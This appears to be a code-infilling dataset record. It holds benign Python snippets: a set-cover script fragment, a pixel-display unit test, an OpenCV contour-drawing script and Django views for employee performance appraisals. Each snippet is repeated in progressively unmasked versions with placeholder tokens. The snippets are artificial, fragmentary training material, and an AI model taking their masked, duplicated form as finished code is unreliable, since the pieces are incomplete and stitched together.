1\n\t\t\telse:\n\t\t\t\tarrItems.remove(\"\\n\")\n\t\tarrItems.sort()\n\t\ts=subset(weight, set(arrItems), len(arrItems), num)\n\t\tsubsetList.append(s)\n\tnum += 1\n\n# print(\"---------------------------------------------\")\n# for s in subsetList:\n# \tprint(s.itemSet)\n# print(\"---------------------------------------------\")\n\ncovers = []\ninc = 1\nfor base in subsetList:\n\t# print()\n\tprint(\"base:\", base.setNum)\n\to = findCover(base, subsetList[inc:len(subsetList)])\n\tif o != None:\n\t\tprint(\"here!\")\n\t\tcovers.append(o)\n\t\t# print(o.setNum)\n\tinc += 1\nfor w in covers:\n\tif w.weight < minWeight:\n\t\tminWeight = w.weight\n\t\t# if type(s.setNum) == int: continue\n\t\t# else: minCover = (s.setNum).split(\" \").sort()\n\t\tminCover = w.setNum\n\nprint(minWeight)\nprint(minCover)\n\n\n# for cov in covers:\n# \tprint(cov.itemSet)\n\n# # \n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class TestDisplay(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
def test_set_pixels(self):
self.display.clear_buffer()
self.display.set_pixel(0, 1, 1)
self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')
self.display.set_pixel(100, 1, 1)
self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'
)
self.display.set_pixel(3, 2, 0)
self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')
<|reserved_special_token_1|>
import unittest
from display import Display
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
def test_set_pixels(self):
self.display.clear_buffer()
self.display.set_pixel(0, 1, 1)
self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')
self.display.set_pixel(100, 1, 1)
self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'
)
self.display.set_pixel(3, 2, 0)
self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')
<|reserved_special_token_1|>
import unittest
from display import Display
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
def test_set_pixels(self):
self.display.clear_buffer()
self.display.set_pixel(0, 1, 1)
self.assertEqual(self.display.get_pixel(0, 1), 1, "pixel was not set")
self.display.set_pixel(100, 1, 1)
self.assertEqual(self.display.get_pixel(100, 1), 1, "pixel was not set")
self.display.set_pixel(3, 2, 0)
self.assertEqual(self.display.get_pixel(3, 2), 0, "pixel was not set")
|
flexible
|
{
"blob_id": "75d2dcbb0c131930602e3c1f2cf30c0e4c5e3c42",
"index": 8262,
"step-1": "<mask token>\n\n\nclass TestDisplay(unittest.TestCase):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestDisplay(unittest.TestCase):\n\n def setUp(self):\n self.display = Display(None)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestDisplay(unittest.TestCase):\n\n def setUp(self):\n self.display = Display(None)\n\n def test_set_pixels(self):\n self.display.clear_buffer()\n self.display.set_pixel(0, 1, 1)\n self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')\n self.display.set_pixel(100, 1, 1)\n self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'\n )\n self.display.set_pixel(3, 2, 0)\n self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')\n",
"step-4": "import unittest\nfrom display import Display\n\n\nclass TestDisplay(unittest.TestCase):\n\n def setUp(self):\n self.display = Display(None)\n\n def test_set_pixels(self):\n self.display.clear_buffer()\n self.display.set_pixel(0, 1, 1)\n self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')\n self.display.set_pixel(100, 1, 1)\n self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'\n )\n self.display.set_pixel(3, 2, 0)\n self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')\n",
"step-5": "import unittest\nfrom display import Display\n\n\nclass TestDisplay(unittest.TestCase):\n def setUp(self):\n self.display = Display(None)\n\n def test_set_pixels(self):\n self.display.clear_buffer()\n self.display.set_pixel(0, 1, 1)\n self.assertEqual(self.display.get_pixel(0, 1), 1, \"pixel was not set\")\n\n self.display.set_pixel(100, 1, 1)\n self.assertEqual(self.display.get_pixel(100, 1), 1, \"pixel was not set\")\n\n self.display.set_pixel(3, 2, 0)\n self.assertEqual(self.display.get_pixel(3, 2), 0, \"pixel was not set\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import cv2
import numpy as np
import random
def main():
img = cv2.imread('test_image.png',0)
res = np.zeros((img.shape[0],img.shape[1],3),np.uint8)
thresh = cv2.threshold(img, 50, 255, 0)[1]
_, contours,_ = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
cv2.drawContours(res, [cnt],0,(random.randint(0,255),random.randint(0,255) ,random.randint(0,255)),-1)
cv2.imshow('res',res)
cv2.waitKey(0)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "1babf9f27e6792d2a1c2545a1e3bcd08fefa0975",
"index": 5639,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n img = cv2.imread('test_image.png', 0)\n res = np.zeros((img.shape[0], img.shape[1], 3), np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.\n CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt], 0, (random.randint(0, 255), random.\n randint(0, 255), random.randint(0, 255)), -1)\n cv2.imshow('res', res)\n cv2.waitKey(0)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n img = cv2.imread('test_image.png', 0)\n res = np.zeros((img.shape[0], img.shape[1], 3), np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.\n CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt], 0, (random.randint(0, 255), random.\n randint(0, 255), random.randint(0, 255)), -1)\n cv2.imshow('res', res)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import cv2\nimport numpy as np\nimport random\n\n\ndef main():\n img = cv2.imread('test_image.png', 0)\n res = np.zeros((img.shape[0], img.shape[1], 3), np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.\n CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt], 0, (random.randint(0, 255), random.\n randint(0, 255), random.randint(0, 255)), -1)\n cv2.imshow('res', res)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import cv2\nimport numpy as np \nimport random\n\n\ndef main():\n img = cv2.imread('test_image.png',0)\n res = np.zeros((img.shape[0],img.shape[1],3),np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours,_ = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt],0,(random.randint(0,255),random.randint(0,255) ,random.randint(0,255)),-1)\n cv2.imshow('res',res)\n cv2.waitKey(0)\n \nif __name__ == \"__main__\":\n main()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<|reserved_special_token_0|>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<|reserved_special_token_0|>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<|reserved_special_token_0|>
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None, instance=get_object_or_404
(Performance, pk=pk))
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
if request.method == 'POST':
if form.is_valid():
form.save()
messages.success(request,
'Successfully! Added notes on what you have done.')
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, 'hrm/performance/performance_notes.html', {
'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id=pk)
perform.status = 1
perform.save()
messages.success(request, 'Successfully! Appraised employee work....')
return HttpResponseRedirect(reverse('hrm:perfom_list'))
<|reserved_special_token_1|>
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
# Create your views here.
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse("accounts:login"))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username = request.session['username'])
employee = Employee.objects.get(user = user.id)
return render(request, "hrm/dashboard.html",
{'employees': employees, 'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, "employee": employee, "user":user})
'''
Perfomance Control
'''
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Created employee and appraisal..."
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = "performances"
template_name = "hrm/performance/performance_list.html"
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Updated an appraisal"
context_object_name = "performance"
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = "performance"
template_name = "hrm/performance/performance_details.html"
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = "Successfully! Deleted an appraisal."
success_url = reverse_lazy("hrm:perfom_list")
template_name = "hrm/performance/performance_delete.html"
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
'''
Showing an employees perfomance control
'''
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
perform = Performance.objects.filter(employee = employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse("hrm:hrm_index"))
return render(request, "hrm/performance/employee_performance.html", {'employee': employee, 'performances': perform})
'''
Employee Provide Notes for his perfomance
'''
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None,instance = get_object_or_404(Performance, pk=pk))
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
if request.method == "POST":
if form.is_valid():
form.save()
messages.success(request, "Successfully! Added notes on what you have done.")
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, "hrm/performance/performance_notes.html", {'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id = pk)
perform.status = 1
perform.save()
messages.success(request, "Successfully! Appraised employee work....")
return HttpResponseRedirect(reverse('hrm:perfom_list'))
|
flexible
|
{
"blob_id": "7c6ac2837751703ac4582ee81c29ccf67b8277bc",
"index": 1632,
"step-1": "<mask token>\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ListPerformanceView(ListView):\n model = Performance\n context_object_name = 'performances'\n template_name = 'hrm/performance/performance_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Updated an appraisal'\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef index(request):\n if not request.session.get('username'):\n return HttpResponseRedirect(reverse('accounts:login'))\n applied_leaves = ApplyLeave.objects.count()\n employees = Employee.objects.count()\n positions = Position.objects.count()\n departments = Department.objects.count()\n user = User.objects.get(username=request.session['username'])\n employee = Employee.objects.get(user=user.id)\n return render(request, 'hrm/dashboard.html', {'employees': employees,\n 'positions': positions, 'departments': departments,\n 'applied_leaves': applied_leaves, 'employee': employee, 'user': user})\n\n\n<mask token>\n\n\nclass CreatePerformanceView(SuccessMessageMixin, CreateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Created employee and appraisal...'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(CreatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass ListPerformanceView(ListView):\n model = Performance\n context_object_name = 'performances'\n template_name = 'hrm/performance/performance_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Updated an appraisal'\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n\n\ndef show_employee_perfomance_control(request):\n check_user_login(request)\n employee = Employee.objects.get(user=User.objects.get(username=request.\n session['username']).id)\n perform = Performance.objects.filter(employee=employee.id)\n print(perform)\n if perform is None:\n return HttpResponseRedirect(reverse('hrm:hrm_index'))\n return render(request, 'hrm/performance/employee_performance.html', {\n 'employee': employee, 'performances': perform})\n\n\n<mask token>\n",
"step-4": "from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView\nfrom accounts.models import Employee\nfrom leave.models import ApplyLeave\nfrom departments.models import Department, Position\nfrom django.contrib.auth.models import User\nfrom hrm.models import Performance\nfrom django.urls import reverse_lazy, reverse\nfrom hrm.forms import PerformanceForm\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib import messages\nfrom helpers.help import check_user_login\n\n\ndef index(request):\n if not request.session.get('username'):\n return HttpResponseRedirect(reverse('accounts:login'))\n applied_leaves = ApplyLeave.objects.count()\n employees = Employee.objects.count()\n positions = Position.objects.count()\n departments = Department.objects.count()\n user = User.objects.get(username=request.session['username'])\n employee = Employee.objects.get(user=user.id)\n return render(request, 'hrm/dashboard.html', {'employees': employees,\n 'positions': positions, 'departments': departments,\n 'applied_leaves': applied_leaves, 'employee': employee, 'user': user})\n\n\n<mask token>\n\n\nclass CreatePerformanceView(SuccessMessageMixin, CreateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Created employee and appraisal...'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(CreatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass ListPerformanceView(ListView):\n model = Performance\n context_object_name = 'performances'\n template_name = 'hrm/performance/performance_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Updated an appraisal'\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n\n\ndef show_employee_perfomance_control(request):\n check_user_login(request)\n employee = Employee.objects.get(user=User.objects.get(username=request.\n session['username']).id)\n perform = Performance.objects.filter(employee=employee.id)\n print(perform)\n if perform is None:\n return HttpResponseRedirect(reverse('hrm:hrm_index'))\n return render(request, 'hrm/performance/employee_performance.html', {\n 'employee': employee, 'performances': perform})\n\n\n<mask token>\n\n\ndef perfomance_notes(request, pk):\n form = PerformanceForm(request.POST or None, instance=get_object_or_404\n (Performance, pk=pk))\n employee = Employee.objects.get(user=User.objects.get(username=request.\n session['username']).id)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n messages.success(request,\n 'Successfully! Added notes on what you have done.')\n return HttpResponseRedirect(reverse('hrm:perfom_employee'))\n return render(request, 'hrm/performance/performance_notes.html', {\n 'form': form, 'employee': employee})\n\n\ndef appraisal(request, pk):\n perform = Performance.objects.get(id=pk)\n perform.status = 1\n perform.save()\n messages.success(request, 'Successfully! Appraised employee work....')\n return HttpResponseRedirect(reverse('hrm:perfom_list'))\n",
"step-5": "from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView\nfrom accounts.models import Employee\nfrom leave.models import ApplyLeave \nfrom departments.models import Department, Position \nfrom django.contrib.auth.models import User\nfrom hrm.models import Performance \nfrom django.urls import reverse_lazy, reverse\nfrom hrm.forms import PerformanceForm\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib import messages\nfrom helpers.help import check_user_login\n# Create your views here.\n\ndef index(request):\n if not request.session.get('username'):\n return HttpResponseRedirect(reverse(\"accounts:login\"))\n\n applied_leaves = ApplyLeave.objects.count()\n employees = Employee.objects.count()\n positions = Position.objects.count()\n departments = Department.objects.count()\n user = User.objects.get(username = request.session['username'])\n employee = Employee.objects.get(user = user.id)\n\n return render(request, \"hrm/dashboard.html\", \n {'employees': employees, 'positions': positions, 'departments': departments,\n 'applied_leaves': applied_leaves, \"employee\": employee, \"user\":user})\n\n\n'''\nPerfomance Control \n'''\n\nclass CreatePerformanceView(SuccessMessageMixin, CreateView):\n model = Performance \n fields = ('employee', 'start_date', 'finish_date', 'objective')\n success_message = \"Successfully! Created employee and appraisal...\"\n template_name = \"hrm/performance/performance_form.html\"\n def get_context_data(self, **kwargs):\n context = super(CreatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = 